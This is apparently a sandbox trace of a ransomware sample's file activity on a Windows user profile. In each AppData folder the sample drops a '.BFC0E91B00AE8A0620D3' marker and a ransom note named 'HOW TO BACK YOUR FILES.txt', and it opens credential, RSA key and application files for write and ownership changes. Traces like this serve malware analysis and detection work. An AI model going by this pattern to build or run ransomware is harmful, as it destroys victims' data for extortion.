Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\System.mdw desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\session.sol desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
